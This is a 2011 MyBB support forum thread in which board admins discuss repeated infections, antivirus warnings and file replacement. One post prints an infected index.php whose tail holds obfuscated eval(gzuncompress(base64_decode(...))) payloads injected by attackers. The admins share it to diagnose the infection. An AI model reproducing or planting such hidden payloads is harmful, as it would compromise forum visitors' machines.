2011-11-16, 01:01 AM
2011-11-16, 09:57 AM
2011-11-16, 10:01 AM
2011-11-16, 10:16 AM
2011-11-16, 06:15 PM
I to was affected before it was announced. I did all of the fixes, and plan to go back through again as soon as I can get to my PC that has ftp access.
But today, a member got this warning from his AVG software:
![[Image: Capture-4.jpg]](https://camo.mybb.com/1aa6d90bfeaff69c839db5865714dfd4efebe338/687474703a2f2f69313233312e70686f746f6275636b65742e636f6d2f616c62756d732f65653530362f7461636f6d617a6163682f436170747572652d342e6a7067)
I just used my phone to check my index.php and found that it has the base 64 junk that the previous posts mentioned!!
INFECTED CODE. FOR EXAMINATION ONLY!!: [attachment=24674]
INFECTED CODE. FOR EXAMINATION ONLY!!:
I'm frantically replacing the files that you guys listed. THANKS! It just sucks that I have to do this with my phone.
I have an old chatbox that also had an infected index.php file. Search for any and all index.php files.
My concern is how were they able to hack in again? Where is the hole? I changed my ftp password and all that the last time around.
I just had to re-upload the clean index.php file on all three of my sites again because it showed a fatal error when I tried to go to the index page.
Is this an isolated problem with Robbert and myself, or the begining of the next onslaught??
Apparently I missed some infected files the first time. I spent my evening going through the entire process again. I hope I got it all this time.
But today, a member got this warning from his AVG software:
I just used my phone to check my index.php and found that it has the base 64 junk that the previous posts mentioned!!
INFECTED CODE. FOR EXAMINATION ONLY!!: [attachment=24674]
INFECTED CODE. FOR EXAMINATION ONLY!!:
<?php
/**
* MyBB 1.6
* Copyright 2010 MyBB Group, All Rights Reserved
*
* Website: http://mybb.com
* License: http://mybb.com/about/license
*
* $Id: index.php 5440 2011-04-15 10:18:35Z Tomm $
*/
define("IN_MYBB", 1);
define('THIS_SCRIPT', 'index.php');
$templatelist = "index,index_whosonline,index_welcomemembertext,index_welcomeguest,index_whosonline_memberbit,forumbit_depth1_cat,forumbit_depth1_forum,forumbit_depth2_cat,forumbit_depth2_forum,forumbit_depth1_forum_lastpost,forumbit_depth2_forum_lastpost,index_modcolumn,forumbit_moderators,forumbit_subforums,index_welcomeguesttext";
$templatelist .= ",index_birthdays_birthday,index_birthdays,index_pms,index_loginform,index_logoutlink,index_stats,forumbit_depth3,forumbit_depth3_statusicon,index_boardstats";
require_once "./global.php";
require_once MYBB_ROOT."inc/functions_post.php";
require_once MYBB_ROOT."inc/functions_forumlist.php";
require_once MYBB_ROOT."inc/class_parser.php";
$parser = new postParser;
$plugins->run_hooks("index_start");
// Load global language phrases
$lang->load("index");
$logoutlink = $loginform = '';
if($mybb->user['uid'] != 0)
{
eval("\$logoutlink = \"".$templates->get("index_logoutlink")."\";");
}
else
{
//Checks to make sure the user can login; they haven't had too many tries at logging in.
//Function call is not fatal
if(login_attempt_check(false) !== false)
{
eval("\$loginform = \"".$templates->get("index_loginform")."\";");
}
}
$whosonline = '';
if($mybb->settings['showwol'] != 0 && $mybb->usergroup['canviewonline'] != 0)
{
// Get the online users.
$timesearch = TIME_NOW - $mybb->settings['wolcutoff'];
$comma = '';
$query = $db->query("
SELECT s.sid, s.ip, s.uid, s.time, s.location, s.location1, u.username, u.invisible, u.usergroup, u.displaygroup
FROM ".TABLE_PREFIX."sessions s
LEFT JOIN ".TABLE_PREFIX."users u ON (s.uid=u.uid)
WHERE s.time>'$timesearch'
ORDER BY u.username ASC, s.time DESC
");
$forum_viewers = array();
$membercount = 0;
$onlinemembers = '';
$guestcount = 0;
$anoncount = 0;
$doneusers = array();
// Fetch spiders
$spiders = $cache->read("spiders");
// Loop through all users.
while($user = $db->fetch_array($query))
{
// Create a key to test if this user is a search bot.
$botkey = my_strtolower(str_replace("bot=", '', $user['sid']));
// Decide what type of user we are dealing with.
if($user['uid'] > 0)
{
// The user is registered.
if($doneusers[$user['uid']] < $user['time'] || !$doneusers[$user['uid']])
{
// If the user is logged in anonymously, update the count for that.
if($user['invisible'] == 1)
{
++$anoncount;
}
++$membercount;
if($user['invisible'] != 1 || $mybb->usergroup['canviewwolinvis'] == 1 || $user['uid'] == $mybb->user['uid'])
{
// If this usergroup can see anonymously logged-in users, mark them.
if($user['invisible'] == 1)
{
$invisiblemark = "*";
}
else
{
$invisiblemark = '';
}
// Properly format the username and assign the template.
$user['username'] = format_name($user['username'], $user['usergroup'], $user['displaygroup']);
$user['profilelink'] = build_profile_link($user['username'], $user['uid']);
eval("\$onlinemembers .= \"".$templates->get("index_whosonline_memberbit", 1, 0)."\";");
$comma = $lang->comma;
}
// This user has been handled.
$doneusers[$user['uid']] = $user['time'];
}
}
elseif(my_strpos($user['sid'], "bot=") !== false && $spiders[$botkey])
{
// The user is a search bot.
$onlinemembers .= $comma.format_name($spiders[$botkey]['name'], $spiders[$botkey]['usergroup']);
$comma = $lang->comma;
++$botcount;
}
else
{
// The user is a guest.
++$guestcount;
}
if($user['location1'])
{
$forum_viewers[$user['location1']]++;
}
}
// Build the who's online bit on the index page.
$onlinecount = $membercount + $guestcount + $botcount;
if($onlinecount != 1)
{
$onlinebit = $lang->online_online_plural;
}
else
{
$onlinebit = $lang->online_online_singular;
}
if($membercount != 1)
{
$memberbit = $lang->online_member_plural;
}
else
{
$memberbit = $lang->online_member_singular;
}
if($anoncount != 1)
{
$anonbit = $lang->online_anon_plural;
}
else
{
$anonbit = $lang->online_anon_singular;
}
if($guestcount != 1)
{
$guestbit = $lang->online_guest_plural;
}
else
{
$guestbit = $lang->online_guest_singular;
}
$lang->online_note = $lang->sprintf($lang->online_note, my_number_format($onlinecount), $onlinebit, $mybb->settings['wolcutoffmins'], my_number_format($membercount), $memberbit, my_number_format($anoncount), $anonbit, my_number_format($guestcount), $guestbit);
eval("\$whosonline = \"".$templates->get("index_whosonline")."\";");
}
// Build the birthdays for to show on the index page.
$bdays = $birthdays = '';
if($mybb->settings['showbirthdays'] != 0)
{
// First, see what day this is.
$bdaycount = 0; $bdayhidden = 0;
$bdaytime = TIME_NOW;
$bdaydate = my_date("j-n", $bdaytime, '', 0);
$year = my_date("Y", $bdaytime, '', 0);
$bdaycache = $cache->read("birthdays");
if(!is_array($bdaycache))
{
$cache->update_birthdays();
$bdaycache = $cache->read("birthdays");
}
$hiddencount = $bdaycache[$bdaydate]['hiddencount'];
$today_bdays = $bdaycache[$bdaydate]['users'];
$comma = '';
if(!empty($today_bdays))
{
foreach($today_bdays as $bdayuser)
{
$bday = explode("-", $bdayuser['birthday']);
if($year > $bday['2'] && $bday['2'] != '')
{
$age = " (".($year - $bday['2']).")";
}
else
{
$age = '';
}
$bdayuser['username'] = format_name($bdayuser['username'], $bdayuser['usergroup'], $bdayuser['displaygroup']);
$bdayuser['profilelink'] = build_profile_link($bdayuser['username'], $bdayuser['uid']);
eval("\$bdays .= \"".$templates->get("index_birthdays_birthday", 1, 0)."\";");
++$bdaycount;
$comma = $lang->comma;
}
}
if($hiddencount > 0)
{
if($bdaycount > 0)
{
$bdays .= " - ";
}
$bdays .= "{$hiddencount} {$lang->birthdayhidden}";
}
// If there are one or more birthdays, show them.
if($bdaycount > 0 || $hiddencount > 0)
{
eval("\$birthdays = \"".$templates->get("index_birthdays")."\";");
}
}
// Build the forum statistics to show on the index page.
if($mybb->settings['showindexstats'] != 0)
{
// First, load the stats cache.
$stats = $cache->read("stats");
// Check who's the newest member.
if(!$stats['lastusername'])
{
$newestmember = "no-one";
}
else
{
$newestmember = build_profile_link($stats['lastusername'], $stats['lastuid']);
}
// Format the stats language.
$lang->stats_posts_threads = $lang->sprintf($lang->stats_posts_threads, my_number_format($stats['numposts']), my_number_format($stats['numthreads']));
$lang->stats_numusers = $lang->sprintf($lang->stats_numusers, my_number_format($stats['numusers']));
$lang->stats_newestuser = $lang->sprintf($lang->stats_newestuser, $newestmember);
// Find out what the highest users online count is.
$mostonline = $cache->read("mostonline");
if($onlinecount > $mostonline['numusers'])
{
$time = TIME_NOW;
$mostonline['numusers'] = $onlinecount;
$mostonline['time'] = $time;
$cache->update("mostonline", $mostonline);
}
$recordcount = $mostonline['numusers'];
$recorddate = my_date($mybb->settings['dateformat'], $mostonline['time']);
$recordtime = my_date($mybb->settings['timeformat'], $mostonline['time']);
// Then format that language string.
$lang->stats_mostonline = $lang->sprintf($lang->stats_mostonline, my_number_format($recordcount), $recorddate, $recordtime);
eval("\$forumstats = \"".$templates->get("index_stats")."\";");
}
// Show the board statistics table only if one or more index statistics are enabled.
if($mybb->settings['showwol'] != 0 || $mybb->settings['showindexstats'] != 0 || ($mybb->settings['showbirthdays'] != 0 && $bdaycount > 0))
{
if(!is_array($stats))
{
// Load the stats cache.
$stats = $cache->read("stats");
}
$post_code_string = '';
if($mybb->user['uid'])
{
$post_code_string = "&my_post_key=".$mybb->post_code;
}
eval("\$boardstats = \"".$templates->get("index_boardstats")."\";");
}
if($mybb->user['uid'] == 0)
{
// Build a forum cache.
$query = $db->query("
SELECT *
FROM ".TABLE_PREFIX."forums
WHERE active != 0
ORDER BY pid, disporder
");
$forumsread = unserialize($mybb->cookies['mybb']['forumread']);
}
else
{
// Build a forum cache.
$query = $db->query("
SELECT f.*, fr.dateline AS lastread
FROM ".TABLE_PREFIX."forums f
LEFT JOIN ".TABLE_PREFIX."forumsread fr ON (fr.fid=f.fid AND fr.uid='{$mybb->user['uid']}')
WHERE f.active != 0
ORDER BY pid, disporder
");
}
while($forum = $db->fetch_array($query))
{
if($mybb->user['uid'] == 0)
{
if($forumsread[$forum['fid']])
{
$forum['lastread'] = $forumsread[$forum['fid']];
}
}
$fcache[$forum['pid']][$forum['disporder']][$forum['fid']] = $forum;
}
$forumpermissions = forum_permissions();
// Get the forum moderators if the setting is enabled.
if($mybb->settings['modlist'] != "off")
{
$moderatorcache = $cache->read("moderators");
}
$excols = "index";
$permissioncache['-1'] = "1";
$bgcolor = "trow1";
// Decide if we're showing first-level subforums on the index page.
if($mybb->settings['subforumsindex'] != 0)
{
$showdepth = 3;
}
else
{
$showdepth = 2;
}
$forum_list = build_forumbits();
$forums = $forum_list['forum_list'];
$plugins->run_hooks("index_end");
eval("\$index = \"".$templates->get("index")."\";");
output_page($index);
?>
<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM='))); eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ=='))); eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?>I'm frantically replacing the files that you guys listed. THANKS! It just sucks that I have to do this with my phone.
I have an old chatbox that also had an infected index.php file. Search for any and all index.php files.
My concern is how were they able to hack in again? Where is the hole? I changed my ftp password and all that the last time around.
I just had to re-upload the clean index.php file on all three of my sites again because it showed a fatal error when I tried to go to the index page.
Is this an isolated problem with Robbert and myself, or the begining of the next onslaught??
Apparently I missed some infected files the first time. I spent my evening going through the entire process again. I hope I got it all this time.
2011-11-19, 12:29 PM
2011-11-19, 02:25 PM
2011-11-22, 10:21 PM
Today the same member got this:
![[Image: Capture2-1.jpg]](https://camo.mybb.com/dbac977c4b45f47093e0d7ec0fa2bc8d2ac208de/687474703a2f2f69313233312e70686f746f6275636b65742e636f6d2f616c62756d732f65653530362f7461636f6d617a6163682f43617074757265322d312e6a7067)
I checked the index.php and it was correct. Did some spot checking and didn't see any of the prblems I saw the last time. I will do more investigating this evening when I get to my PC, but wanted to post this in the meantime.
Any thoughts on what I should be looking for? And where I should be looking?
I checked the index.php and it was correct. Did some spot checking and didn't see any of the prblems I saw the last time. I will do more investigating this evening when I get to my PC, but wanted to post this in the meantime.
Any thoughts on what I should be looking for? And where I should be looking?
2011-11-22, 10:51 PM
(2011-11-22, 10:21 PM)Reserector Wrote: [ -> ]Today the same member got this:
I checked the index.php and it was correct. Did some spot checking and didn't see any of the prblems I saw the last time. I will do more investigating this evening when I get to my PC, but wanted to post this in the meantime.
Any thoughts on what I should be looking for? And where I should be looking?
A member at my site got the exact same thing. There were 5 or 6 files that had been changed in File Verification, so I swapped those out as well as the index PHP file. Hope that solves it for now. Still not cool that after the problem and alleged fix my users may be getting trojans.
2011-12-28, 11:03 PM
It's been awhile with no virus alerts, until today. I admit I have been putting off the 1.6.5 update. I want to know if this recent upgrade will make this problem go away, or do I need to fix this virus problem before continuing?
Here is what a forum member posted for me today:
I have replaced pretty much all php and js files with clean files from the last upgrade, plus the security fix. Changed my password on my server, also. Based on what keeps showing up, what files should I be checking or replacing?
![[Image: attachment.php?aid=6476]](https://camo.mybb.com/f60d9b6a65231287f5550e29d4c86a75d5d29baf/687474703a2f2f6d697373697373697070692d6d75642e636f6d2f6174746163686d656e742e7068703f6169643d36343736)
Here is what a forum member posted for me today:
I have replaced pretty much all php and js files with clean files from the last upgrade, plus the security fix. Changed my password on my server, also. Based on what keeps showing up, what files should I be checking or replacing?